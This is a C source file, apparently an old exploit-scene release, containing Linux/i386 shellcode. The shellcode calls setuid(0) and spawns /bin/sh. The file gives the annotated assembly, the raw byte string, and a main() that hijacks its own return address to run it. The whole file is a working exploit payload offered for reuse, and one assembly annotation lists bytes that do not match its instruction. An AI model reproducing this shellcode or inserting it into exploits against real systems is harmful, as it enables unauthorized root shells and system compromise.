/*
 *     __   ___   _
 *    /  \ |   \ | | /\-----------<<ShellCode_setuid_execve.c>>--------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /       Author:             ORK
 *  \______/ |\ \| | \       email:              orkmail@katamail.com     
 *<--------|_| \_\_|\_\
 *
 *
 * This is a simple linux/i386 ShellCode that execute /bin/sh after a
 * setuid(0).
 *
 *
 * ASM Code:
 *
 *        #  setuid(0);
 *        xor    %eax, %eax           #  0x31 0xc0 
 *        xor    %ebx, %ebx           #  0x31 0xdb
 *        movb   $0x17,%al            #  0x88 0x46 0x23
 *        int    $0x80                #  0xcd 0x80 
 *
 *        jmp    call                 #  0xeb 0x1e
 * pop:
 *        popl   %esi                 #  0x5e
 *
 *        #  execve(foo[0], foo, 0);
 *        xor    %eax,%eax            #  0x31 0xc0     
 *        movb   %al,0x7(%esi)        #  0x88 0x46 0x07 
 *        movl   %esi,0x8(%esi)       #  0x89 0x76 0x08
 *        movl   %eax,0xc(%esi)       #  0x89 0x46 0x0c  
 *        movb   $0xb,%al             #  0xb0 0x0b 
 *        movl   %esi,%ebx            #  0x89 0xf3 
 *        leal   0x8(%esi),%ecx       #  0x8d 0x4e 0x08 
 *        leal   0xc(%esi),%edx       #  0x8d 0x56 0x0c  
 *        int    $0x80                #  0xcd 0x80 
 *
 *        #  exit(0);
 *        movb   $0x1, %al            #  0xb0 0x01
 *        xor    %ebx, %ebx           #  0x31 0xdb 
 *        int    $0x80                #  0xcd 0x80  
 * call:
 *        call   pop                  #  0xe8 0xdd 0xff 0xff 0xff
 *        .string "/bin/sh"
 *
 */

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1e\x5e\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";

main() 
{
  int *ret;
  ret = (int *)&ret + 2; 
  (*ret) = (int)shellcode;  
}